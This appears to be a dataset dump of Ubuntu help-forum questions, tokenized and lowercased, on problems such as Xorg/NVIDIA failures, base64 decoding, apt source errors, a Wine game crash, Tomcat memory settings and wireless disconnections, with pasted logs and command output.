pci:1:0:0 ( gpu-0 ) [ 48.321 ] ( -- ) nvidia ( 0 ) : memory : 1048576 kbytes [ 48.321 ] ( -- ) nvidia ( 0 ) : videobios : 80.07.22.00.07 [ 48.321 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 48.321 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 48.324 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gtx 660m at pci:1:0:0 [ 48.324 ] ( -- ) nvidia ( 0 ) : crt-0 [ 48.324 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 48.324 ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 48.326 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 48.345 ] ( ii ) unloadmodule : `` nvidia '' [ 48.345 ] ( ii ) unloading nvidia [ 48.345 ] ( ii ) unloadmodule : `` wfb '' [ 48.345 ] ( ii ) unloading wfb [ 48.345 ] ( ii ) unloadmodule : `` fb '' [ 48.345 ] ( ii ) unloading fb [ 48.345 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 48.345 ] fatal server error : [ 48.345 ] no screens found [ 48.345 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 48.345 ] please also check the log file at `` /var/log/xorg.8.log '' for additional > information . [ 48.345 ] [ 48.345 ] ddxsiggiveup : closing log [ 48.345 ] server terminated with error ( 1 ) . closing log file .
178521	how can i decode a base64 string from the command line ?	i would like to write a bash script to decode a base64 string . for example i type decode qwxhzgrpbjpvcgvuihnlc2ftzq== and it prints aladdin : open sesame and returns to the prompt . so far i have tried a simple bash file containing python -m base64 -d $ 1 but this command expects a filename not a string . is there another non-interactive command ( not necessarily in a python module ) that i can run from the command line to achieve this , without having to install any extra packages ? ( or if i do , something super-minimal . )
178525	how to get rid of virtual keyboard when display is locked ?	when my screen gets locked after 10min and i sign in again , i have a virtual keyboard on my screen since a few days . i do n't need it and find it annoying . how can i get rid of it ?
178527	how detect intel graphic processor ?	my laptop has a nvidia 425 geforce video card ! i 'm keen on to find wether my laptop has another ( intel ) graphic processor or not ? and so , enable intel integrated for usage ! how should i find this ?
178528	sharing folder error	i have 10 user on my ubuntu 10.04 - one folder called `` public '' located in one user 's documents . i like to share the folder , so everyone have access to that folder , as it will be the local folder everyone will use . under sharing , i get the following error message : 'net usershare ' returned error 255 : net usershare add : can not convert name `` everyone '' to a sid . invalid parameter . '' what can i do ?
178529	guild wars 2 installation crash	i am trying to install gw2 to take advantage of my early access , but i keep coming up on this same problem . the installation starts fine , the initial processes to install direct x and whatnot are fine . however , after that the installer kinda flickers and ca n't install a single game file without crashing . i am running ubuntu 12.04 lts and i am using pol to install . here is the log : * -- > crash < -- * exception : c0000005 memory at address 00000000 could not be read app : gw2.exe pid : 57 cmdline : baseaddr : 00400000 programid : 101 build : 15205 when : 2012-08-21t12:30:21z 2012-08-21t06:30:21-06:00 uptime : 0 days 0:02:04 flags : 0 * -- > system < -- * name : jake ipaddr : 192.168.0.11 processors : 4 [ genuineintel:6:10:7 ] osversion : windows 5.1 ( 32 bit ) * -- > system memory < -- * physical : 7108mb/ 7987mb 88 % paged : 15216mb/16095mb 94 % virtual : 3071mb/ 3071mb 100 % load : 11 % * -- > process memory < -- * private : 0mb workingset : 0mb peakworkingset : 0mb pagefaults : 0 [ dbghelp.dll is c : \windows\system32\dbghelp.dll ] [ dbghelp.dll version 5.1.2600.3264 ( 64/32-bit compatible ) ] * -- > thread 0x40 < -- * * -- > trace < -- * pc:00649488 fr:34b0e8e8 rt:00647d06 arg:05f4cae8 00000000 056ebcd0 056ebd10 pc:00647d06 fr:34b0e990 rt:00647df1 arg:05f4ca60 000003e8 34b0e9b8 056ebd10 pc:00647df1 fr:34b0e9b0 rt:00647e55 arg:00000000 00897d83 056ecd60 0064744f pc:00647e55 fr:34b0e9d4 rt:00897d5d arg:056ecd60 440a1506 00897d83 01cf0fb8 pc:00897d5d fr:34b0ea0c rt:00897e05 arg:81fe8f10 34b0ea28 7bc72a50 01cf0fb8 pc:00897e05 fr:34b0ea18 rt:7bc72a50 arg:01cf0fb8 7bca77cc 34b0eaf8 7bc7547d pc:7bc72a50 fr:34b0ea28 rt:7bc7547d arg:00897d83 01cf0fb8 00000000 00110014 pc:7bc7547d fr:34b0eaf8 rt:7bc72a2e arg:00897d83 01cf0fb8 34b0eb18 00897d83 pc:7bc72a2e fr:34b0eb18 rt:7bc7ae69 arg:00897d83 01cf0fb8 00000000 00000000 pc:7bc7ae69 fr:34b0f368 rt : b75dcd4c arg:81fe8fb8 34b0fb40 34b0fb40 34b0fb40 pc : b75dcd4c fr:34b0f468 rt : b751aace arg:34b0fb40 00000000 00000000 00000000 * -- > thread registers < -- * eax=00000000 ebx=056ebcd0 ecx=00000000 edx=00000000 esi=05f4cae8 edi=05f4ca60 eip=00649488 esp=34b0e8dc ebp=34b0e8e8 cs=0073 ss=007b ds=007b es=007b fs=0033 gs=003b efl=00210206 ebx-32 056ebcb0 00000000 00000000 00000000 00000000 ebx-16 056ebcc0 00000000 00000000 00001090 056ebc08 ebx +0 056ebcd0 00000000 00000001 000010dc 00000001 ebx+16 056ebce0 000010e0 00000000 00000000 0000000f ebx+32 056ebcf0 00000010 00000011 00000000 00000000 ebx+48 056ebd00 00000000 00000000 00000000 00000000 esi-32 05f4cac8 00000000 00000001 01282744 00000000 esi-16 05f4cad8 00000000 00000000 00001b21 00000000 esi +0 05f4cae8 00000103 00000000 00000000 00000000 esi+16 05f4caf8 00000000 05f4cafc 05f4cafd 00000000 esi+32 05f4cb08 00000001 00000000 00000000 00000000 esi+48 05f4cb18 00000001 bacf756f e5d7ca8b 7ab8f56f edi-32 05f4ca40 37524800 00000000 00000e00 00000126 edi-16 05f4ca50 05dfba70 06e970c0 00000ec1 05f4ca38 edi +0 05f4ca60 00000000 00000000 00000000 ffffffff edi+16 05f4ca70 00000000 00000000 00000000 00000000 edi+32 05f4ca80 00000000 00000000 00000000 00000000 edi+48 05f4ca90 00000000 00000000 00000000 00000000 * -- > code < -- * 00649468 cccccccc cccccccc 558bec56 8b750857 ... ... ..u..v.u.w 00649478 8bf985f6 0f84f401 0000538b 4d0c8b07 ... ... ... .s.m ... 00649488 8b105156 8bcfffd2 85c00f84 dd010000 ..qv ... ... ... ... 00649498 8d4f08c7 45080000 0000e8c9 a8ffffbb .o..e ... ... ... .. 006494a8 01000000 015f4c85 f6751468 83010000 ... .._l..u.h ... . 006494b8 ba10ad1f 01b9ecad 1f01e8d9 3c00008b ... ... ... ... < ... * -- > stack < -- * 34b0e8dc 056ebcd0 00000000 056ecd60 34b0e990 ..n ... ..`.n ... .4 34b0e8ec 00647d06 05f4cae8 00000000 056ebcd0 . } d ... ... ... ..n . 34b0e8fc 056ebd10 056ecd60 34b0e964 7bc4925a ..n.`.n.d..4z.. { 34b0e90c 0000006c 7bc50bf6 7b898fce 013f0364 l ... ... { ... { d. ? . 34b0e91c 0000006c 00110200 00000083 00110490 l ... ... ... ... ... 34b0e92c 0000947c 7b897db8 7bc469d4 001a0000 | ... . } . { .i. { ... . 34b0e93c 00000002 001901c8 7bca77cc 7bc3667f ... ... ... w. { .f . { 34b0e94c 00000200 34b0e964 7bc46b96 0008fe48 ... .d..4.k. { h ... 34b0e95c b7560916 7bca77cc 34b0e9c4 7bc496ae ..v..w. { ... 4 ... { 34b0e96c 00110060 00000000 00000200 000000fb ` ... ... ... ... ... 34b0e97c 00110490 00000000 00000000 05f4cae8 ... ... ... ... ... . 34b0e98c 00000000 34b0e9b0 00647df1 05f4ca60 ... ... .4. } d.` ... 34b0e99c 000003e8 34b0e9b8 056ebd10 056ebcd0 ... ... .4..n ... n. 34b0e9ac 7bca77cc 34b0e9d4 00647e55 00000000 .w. { ... 4u~d ... .. 34b0e9bc 00897d83 056ecd60 0064744f 00897d83 . } ..`.n.otd.. } .. 34b0e9cc 01cf0fb8 00000000 34b0ea0c 00897d5d ... ... ... ..4 ] } .. 34b0e9dc 056ecd60 440a1506 00897d83 01cf0fb8 `.n ... .d. } ... ... 34b0e9ec 7bca77cc c0000005 34b0e9e0 34b0e440 .w . { ... ... .4 @ ..4 34b0e9fc 34b0ea40 00897ec0 71eded8a 00000000 @ ..4.~ ... ..q ... . 34b0ea0c 34b0ea18 00897e05 81fe8f10 34b0ea28 ... 4.~ ... ... ( ..4 34b0ea1c 7bc72a50 01cf0fb8 7bca77cc 34b0eaf8 p*. { ... ..w . { ... 4 34b0ea2c 7bc7547d 00897d83 01cf0fb8 00000000 } t. { . } ... ... ... . 34b0ea3c 00110014 ffffffff 7bc89840 7b83afc0 ... ... .. @ .. { ... { 34b0ea4c 7bca77cc 81fe8f10 00897d83 34b0eaf8 .w. { ... .. } ... ..4 34b0ea5c d3640be6 3c18cf78 00000000 00000000 ..d.x.. < ... ... .. 34b0ea6c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ea7c 00000000 00000000 34b0f368 00000000 ... ... ..h..4 ... . 34b0ea8c 7bcc33a0 b75e1a2e 00000040 6d151ef0 .3. { ..^ . @ ... ... m 34b0ea9c 0018fa50 00000000 0018fa38 7bcb0060 p ... ... .8 ... `.. { 34b0eaac 7bc93da6 7bc93034 81fe8000 00008894 .=. { 40. { ... ... .. 34b0eabc 7bc3667f 00000000 00000000 00000000 .f. { ... ... ... ... 34b0eacc 7bca77cc 0013f880 7bca77cc 34b0eb18 .w. { ... ..w . { ... 4 34b0eadc 7bc4ebde 7bcb00c4 00000000 81fe9000 ... { ... { ... ... .. 34b0eaec 7bca77cc 7bc75409 7bca77cc 34b0eb18 .w. { .t. { .w . { ... 4 34b0eafc 7bc72a2e 00897d83 01cf0fb8 34b0eb18 .*. { . } ... ... ... 4 34b0eb0c 00897d83 81fe8f10 7bca77cc 34b0f368 . } ... ... .w . { h..4 34b0eb1c 7bc7ae69 00897d83 01cf0fb8 00000000 i.. { . } ... ... ... . 34b0eb2c 00000000 00000000 00000000 81fe81bc ... ... ... ... ... . 34b0eb3c 01cf0fb8 00000000 00000000 34b0eba6 ... ... ... ... ... 4 34b0eb4c 34b0ef50 34330030 38653062 66006364 p..40.34b0e8dc.f 34b0eb5c 3c74616c 30623433 63643865 3631003e lat < 34b0e8dc > .16 34b0eb6c 303c3631 3a303030 30303030 3433003e 16 < 0000:0000 > .34 34b0eb7c 38653062 66003865 3c74616c 30623433 b0e8e8.flat < 34b0 34b0eb8c 38653865 3436003e 38383439 616c6600 e8e8 > .649488.fla 34b0eb9c 34363c74 38383439 0000003e 00000000 t < 649488 > ... ... . 34b0ebac 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ebbc 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ebcc 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ebdc 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ebec 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ebfc 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec0c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec1c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec2c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec3c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec4c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec5c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec6c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec7c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec8c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ec9c 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ecac 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0ecbc 00000000 00000000 00000000 00000000 ... ... ... ... ... . 34b0eccc 00000000 00000000 00000000 00000000 ... ... ... ... ... . * -- > error logs < -- * getlogicalprocessorinformation failed , increase buffer bytes to 1536 download failed for 0x00063f44:0x00000000- > 0x00063f44 with error 7:0:0:0 ( error : product : module : line ) [ retry count : 0 ] * -- > directx device info < -- * vendorid = 0x10de deviceid = 0x1200 version = 6.15.0012.6658 description = nvidia geforce gtx 560 ti compat = 0x00080000 vidmem = 1073 mb dunno if anyone can tell me anything , i 've checked a few other forums and nobody has any solution to this problem . could be anet trying to block third-party users from enjoying this game , but i 'm really hoping this is not the case . any help would be greatly appreciated .
178532	e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read	the software center was n't working so i tried to uninstall and and reinstall and i got this message : e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . these are lines 59 and 60 : deb http : //archive.canonical.com/ partner deb-src http : //archive.canonical.com/ partner
178534	impossible installing ckan	i almost nothing about ubuntu . when i try to run the command to install of a package called ckan , i am said that 'unable to locate package' i followed this http : //docs.ckan.org/en/ckan-1.7.1/install-from-package.html and first , before running the ckan installing command , i ran wget -qo- `` http : //apt.ckan.org/packages_public.key '' | sudo apt-key add - , i had the following message : does anybody has an idea ?
178535	how to install linux without affecting my original os ?	how can i install ubuntu linux 12.04 without affecting my original windows 7 os ? i just want to try using linux for a while before i share my hard drive with it . so please anyone let me know how to install linux without affecting my original os ?
178542	12.04 internal error ( sorry ubuntu 12.04 has experienced an internal error )	i am running 12.04 lts . i have been since its release . but all of a sudden my machine now take 5/6 minutes to boot up . i do not have sound anymore , where pulse audio was listed now reads dummy output . also all usbs have stopped working and cd/dvd drives ( x2 ) . also now my built in mmc card reader is not working . my machine is an old packard bell imedia s1839 , intel duo core processor with 4gb ram x2 sata drives 1 x 1tb 1x 320gb . ubuntu worked really well up to 5 days ago . i do n't want to wipe everything off and try to reinstall as i ca n't back up data . any ideas please ?
178547	connection drops out regularly with a ralink rt2800	i 'm not sure what 's causing the problem , nevertheless , i began to encounter regular wireless disconnections after upgrading to ubuntu 12.04.1 lts . using system profiler and benchmark utility , i 've checked if all drivers working as intended . seems like there is no problem from this perspective . so , i 've decided to go with a temporarily solution by using wicd network manager , some individuals said it keeps the wireless connection stable . - however , not in my case . furthermore , i 've tried using manual settings for ipv4 , instead of using dhcp . ( also disabled ipv6 ) . performed sudo /etc/init.d/networking restart ( temporary fix ) ... also , i tried the backports solution and the ndiswrapper solution - nothing is working . including some information for reference : hardware information : lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 01 serial : 00:1a:4d:52 : ee:1d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport : d000 ( size=256 ) memory : e9000000-e9000fff memory : ea300000-ea31ffff *-network description : wireless interface product : rt2800 802.11n pci vendor : ralink corp. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 00 serial : 00:0e:2e : e5:56:0c width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.2.0-29-generic-pae firmware=0.34 ip=192.168.0.4 latency=32 link=yes maxlatency=4 mingnt=2 multicast=yes wireless=ieee 802.11bgn resources : irq:20 memory : ea100000-ea10ffff lspci 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) 05:00.0 network controller : ralink corp. rt2800 802.11n pci for some reason can not insert result from lspci -vvv in pre format iwconfig wlan0 ieee 802.11bgn essid : '' prv '' mode : managed frequency:2.422 ghz access point : 00:26 : f2:46:50:90 bit rate=135 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3271 invalid misc:137 missed beacon:0 i do n't take advantage of network encryption as other connected devices do n't support certain types of encryption , hence , instead i 've created a mac access-list and disabled network name broadcasting . ( ssid ) notice the number of invalid misc . some packets lost in relation with specific wireless operations , how can this be eliminated ? + excessive retries . rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no modules module size used by pci_stub 12550 1 vboxpci 22882 0 vboxnetadp 25616 0 vboxnetflt 27211 0 vboxdrv 252228 3 vboxpci , vboxnetadp , vboxnetflt rfcomm 38139 0 bnep 17830 2 bluetooth 158438 10 rfcomm , bnep vesafb 13516 1 binfmt_misc 17292 1 snd_hda_codec_realtek 174222 1 snd_hda_intel 32765 3 snd_hda_codec 109562 2 snd_hda_codec_realtek , snd_hda_intel arc4 12473 2 snd_usb_audio 101566 2 snd_pcm 80845 3 snd_hda_intel , snd_hda_codec , snd_usb_audio rt2800pci 18340 0 rt2800lib 53264 1 rt2800pci crc_ccitt 12595 1 rt2800lib rt2x00pci 14202 1 rt2800pci snd_hwdep 13276 2 snd_hda_codec , snd_usb_audio snd_usbmidi_lib 24603 1 snd_usb_audio rt2x00lib 48805 3 rt2800pci , rt2800lib , rt2x00pci snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi mac80211 436455 3 rt2800lib , rt2x00pci , rt2x00lib snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event joydev 17393 0 snd_rawmidi 25424 2 snd_usbmidi_lib , snd_seq_midi snd_timer 28931 2 snd_pcm , snd_seq ppdev 12849 0 snd_seq_device 14172 3 snd_seq_midi , snd_seq , snd_rawmidi nvidia 10962290 40 cfg80211 178679 2 rt2x00lib , mac80211 parport_pc 32114 1 psmouse 72919 0 eeprom_93cx6 12653 1 rt2800pci serio_raw 13027 0 snd 62064 21 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_usb_audio , snd_pcm , snd_hwdep , snd_usbmidi_lib , snd_seq , snd_rawmidi , snd_timer , snd_seq_device mac_hid 13077 0 soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lp 17455 0 parport 40930 3 ppdev , parport_pc , lp pata_jmicron 12651 0 usbhid 41906 0 hid 77367 1 usbhid floppy 60310 0 r8169 56321 0 creating a shell script file to reset wireless interface network 'module ' , did n't help . # ! /bin/sh service network-manager stop modprobe -r rt2800pci modprobe rt2800pci service network-manager start if i have n't presented specific information , let me know . thank you in advance ! : )
178549	tomcat heap space settings seems not applied	i 've a tomcat 6 installation in ubuntu 10.04 and wanting to increase java heap space , i went to /etc/default/tomcat6 and uncommented and changed the following line : java_opts= '' -djava.awt.headless=true -xmx1024m '' however , when i went to the tomcat manager status page , i read : jvm free memory : 125.29 mb total memory : 382.43 mb max memory : 510.43 mb so i went to check my /etc/init.d/tomcat6 script and added echo $ tomcat_sh , just before start-stop-daemon -- start , to check that the variable actually went through , and i got : # /etc/init.d/tomcat6 start * starting tomcat servlet engine tomcat6 'set -a ; java_home= '' /usr/lib/jvm/java-6-openjdk '' ; source `` /etc/default/tomcat6 '' ; catalina_home= '' /usr/share/tomcat6 '' ; catalina_base= '' /var/lib/tomcat6 '' ; java_opts= '' -djava.awt.headless=true -xmx1024m -xx : +useconcmarksweepgc -djava.net.preferipv4stack=true '' ; catalina_pid= '' /var/run/tomcat6.pid '' ; catalina_tmpdir= '' /tmp/tomcat6-tmp '' ; lang= '' en_gb '' ; jsse_home= '' /usr/lib/jvm/java-6-openjdk/jre/ '' ; cd `` /var/lib/tomcat6 '' ; `` /usr/share/tomcat6/bin/catalina.sh '' start' ... done . which looks ok , so i was wondering why tomcat manager says i 've only 510mb of max memory . how can i make sure that the memory setting has been applied ?
178552	libre office ( read only ) issue	i run ubuntu 10.04 with the latest version of libreoffice ( the one release the other day ) . when downloading a document - like something in excel in my firefox , and want to open it , it opens up in read-only mode . i have to save the document first on my computer , then open it up to get the normal document , to be able to edit it . i would like just to open up the download document , edit it and then store it . not download it , store it , and then edit it , while then i have to shave it again . is there only a setting wrong ? any help appreciated
178555	ubuntu screen black after log in	i have a problem with my ubuntu install . after i get the log in prompt , the screen goes black and never comes back . but i know the system is running because i can ssh into the box and my websites that i built still run . i think the problem is related to the fact that a few days ago , i had serious problems with mysql and i could n't install or uninstall mysql-server-5.5 . the only way i could get around it was to run a purge on mysql* . while that allowed me to then reinstall a clean copy of mysql ... this is the first time i 've rebooted since running that command . the other behavior i noticed before rebooting was that the gui no longer knew about different apps like firefox . so the way i had to launch was to find where the exe was stored and then add my own shortcut to the desktop . i do n't know ubuntu well at all - just a linux newbie . but it seems like the o/s uses mysql for it 's own information ... and somehow by blowing away mysql* , i 've managed to mess up the gui part of ubuntu . the exact command i ran was : sudo apt-get purge mysql* i still have a log of what it removed ... here 's the list : purging configuration files for libmuonprivate1 ... removing apturl-kde ... removing software-properties-kde ... removing plasma-widget-facebook ... removing plasma-scriptengine-python ... removing apport-kde ... removing userconfig ... removing usb-creator-kde ... removing printer-applet ... removing language-selector-kde ... removing kde-config-touchpad ... purging configuration files for kde-config-touchpad ... removing jockey-kde ... purging configuration files for jockey-kde ... removing python-kde4 ... removing plasma-widgets-addons ... removing plasma-dataengines-workspace ... removing kmail ... purging configuration files for kmail ... removing libmessagelist4 ... purging configuration files for libmessagelist4 ... removing libksieveui4 ... purging configuration files for libksieveui4 ... removing kopete ... purging configuration files for kopete ... removing kopete-message-indicator ... removing libkopete4 ... purging configuration files for libkopete4 ... removing korganizer ... purging configuration files for korganizer ... removing libeventviews4 ... purging configuration files for libeventviews4 ... removing kontact ... purging configuration files for kontact ... removing ktimetracker ... removing knotes ... purging configuration files for knotes ... removing kdepim-kresources ... purging configuration files for kdepim-kresources ... removing kaddressbook ... purging configuration files for kaddressbook ... removing akregator ... purging configuration files for akregator ... removing kdepim-strigi-plugins ... removing amarok ... purging configuration files for amarok ... removing mysql-client ... removing mysql-client-5.5 ... removing libdbd-mysql-perl ... removing php5-mysql ... purging configuration files for php5-mysql ... removing libmessagecomposer4 ... purging configuration files for libmessagecomposer4 ... any suggestions on how i can get my screen back ?
178559	will quickly applications work on debian ?	i have created an ubuntu applications using quickly , but i am wondering if the .deb package that quickly has created will work on debian . do quickly applications work only on ubuntu ?
178560	some times system is freezing	my friend 's computer is freezing . he is using a samsung notebook with a 640 hard disk , 4gb of ram , i3 second generation processor 2330 . he is using ubuntu 12.04 . his system is freezing some times . the brightness symbol is came at top right , and it is blinking . then , the system is freezing . we restarted the system , but the problem occurred again . please tell me how can i solve the problem , step by step . thank you .
178565	how to get lock screen option in lubuntu ?	i am using ubuntu 12.04 with many de . lubuntu is one of them . i do n't have any option to lock screen in lubuntu while i do in unity and other de . is there any program / application that i can install in order to lock screen in lubuntu ?
178567	how to add a program as startup application from terminal ?	i am using ubuntu 12.04 and i know the gui way to maintain the startup program list but now i want to find out the way to add/remove startup applications through command line interface ( cli ) . thank you .
178570	can not connect to password protected wireless networks on a samsung nc20	my problem is pretty much a duplicate of wireless security ( wpa + wpa2 ) passwords not accepted ; wireless security = 'none ' is functional but there was no proper answer there and i could n't find a way to comment on it , so here it goes again . i have a samsung nc20 . i was using natty for a while and all was working fine with the wireless . after upgrading to oneiric i could n't connect to protected networks anymore . the networks are detected but when i try to connect , network manager just keeps trying until it times out , i guess . unsecured networks work fine . i upgraded to precise using an unsecured network but the problem remains . i tried looking up a solution to this problem on this website and other places but could n't find anything that worked . i tried wicd instead of network manager as some people suggested : same problem . i installed the compat wireless stuff linux-backports-modules-cw-3.3-precise-generic but that also did n't help . as you can imagine this is really annoying and i would really appreciate some help . thanks in advance ! p.s . - here 's the output of some possibly relevant commands : $ lspci -v 00:00.0 host bridge : via technologies , inc. vx800 host bridge ( rev 12 ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 00:00.1 host bridge : via technologies , inc. vx800/vx820 error reporting subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 0 00:00.2 host bridge : via technologies , inc. vx800/vx820 host bus control subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 0 00:00.3 host bridge : via technologies , inc. vx800 pci to pci bridge flags : bus master , medium devsel , latency 0 00:00.4 host bridge : via technologies , inc. vx800/vx820 power management control subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 0 00:00.5 pic : via technologies , inc. vx800/vx820 apic and central traffic control ( prog-if 20 [ io ( x ) -apic ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , fast devsel , latency 0 00:00.6 host bridge : via technologies , inc. vx800/vx820 scratch registers subsystem : samsung electronics co ltd device c04e flags : bus master , fast devsel , latency 0 00:00.7 host bridge : via technologies , inc. vx800/vx820 north-south module interface control subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 0 00:01.0 vga compatible controller : via technologies , inc. vx800/vx820 chrome 9 hc3 integrated graphics ( rev 11 ) ( prog-if 00 [ vga controller ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , fast devsel , latency 32 , irq 10 memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at f4000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at f0000000 ( 32-bit , non-prefetchable ) [ size=64m ] [ virtual ] expansion rom at 80000000 [ disabled ] [ size=64k ] capabilities : < access denied > kernel modules : viafb 00:03.0 pci bridge : via technologies , inc. vx800/vx820 pci express root port ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : f5000000-f50fffff prefetchable memory behind bridge : 0000000080300000-00000000804fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:03.1 pci bridge : via technologies , inc. vx800/vx820 pci express root port ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00005000-00005fff memory behind bridge : f5100000-f51fffff prefetchable memory behind bridge : 0000000080100000-00000000802fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:0d.0 flash memory : via technologies , inc . secure digital memory card controller subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 , irq 23 memory at f5404000 ( 32-bit , non-prefetchable ) [ size=2k ] i/o ports at 4470 [ size=8 ] capabilities : < access denied > kernel driver in use : via_sdmmc kernel modules : via-sdmmc 00:0f.0 ide interface : via technologies , inc. vx800 serial ata and eide controller ( prog-if 8a [ master secp prip ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 [ virtual ] memory at 000001f0 ( 32-bit , non-prefetchable ) [ size=8 ] [ virtual ] memory at 000003f0 ( type 3 , non-prefetchable ) [ size=1 ] [ virtual ] memory at 00000170 ( 32-bit , non-prefetchable ) [ size=8 ] [ virtual ] memory at 00000370 ( type 3 , non-prefetchable ) [ size=1 ] i/o ports at 4460 [ size=16 ] capabilities : < access denied > kernel driver in use : pata_via kernel modules : pata_via 00:10.0 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) ( prog-if 00 [ uhci ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 , irq 20 i/o ports at 4400 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.1 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) ( prog-if 00 [ uhci ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 , irq 22 i/o ports at 4420 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.2 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) ( prog-if 00 [ uhci ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 , irq 21 i/o ports at 4440 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:10.4 usb controller : via technologies , inc. usb 2.0 ( rev 90 ) ( prog-if 20 [ ehci ] ) subsystem : samsung electronics co ltd device c04e flags : bus master , medium devsel , latency 32 , irq 23 memory at f5404800 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:11.0 isa bridge : via technologies , inc. vx800/vx820 bus control and power management subsystem : samsung electronics co ltd device c04e flags : medium devsel capabilities : < access denied > kernel modules : i2c-viapro 00:11.7 host bridge : via technologies , inc. vx8xx south-north module interface control subsystem : via technologies , inc. device 7323 flags : medium devsel 00:14.0 audio device : via technologies , inc. vt8237a/vt8251 hda controller ( rev 20 ) subsystem : samsung electronics co ltd device c04e flags : bus master , fast devsel , latency 0 , irq 67 memory at f5400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 01:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 ) subsystem : askey computer corp. device 7131 flags : bus master , fast devsel , latency 0 , irq 28 memory at f5000000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : ath5k kernel modules : ath5k 02:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 13 ) subsystem : samsung electronics co ltd device c04e flags : bus master , fast devsel , latency 0 , irq 66 memory at f5100000 ( 64-bit , non-prefetchable ) [ size=16k ] i/o ports at 5000 [ size=256 ] capabilities : < access denied > kernel driver in use : sky2 kernel modules : sky2 and $ ifconfig eth0 link encap : ethernet hwaddr 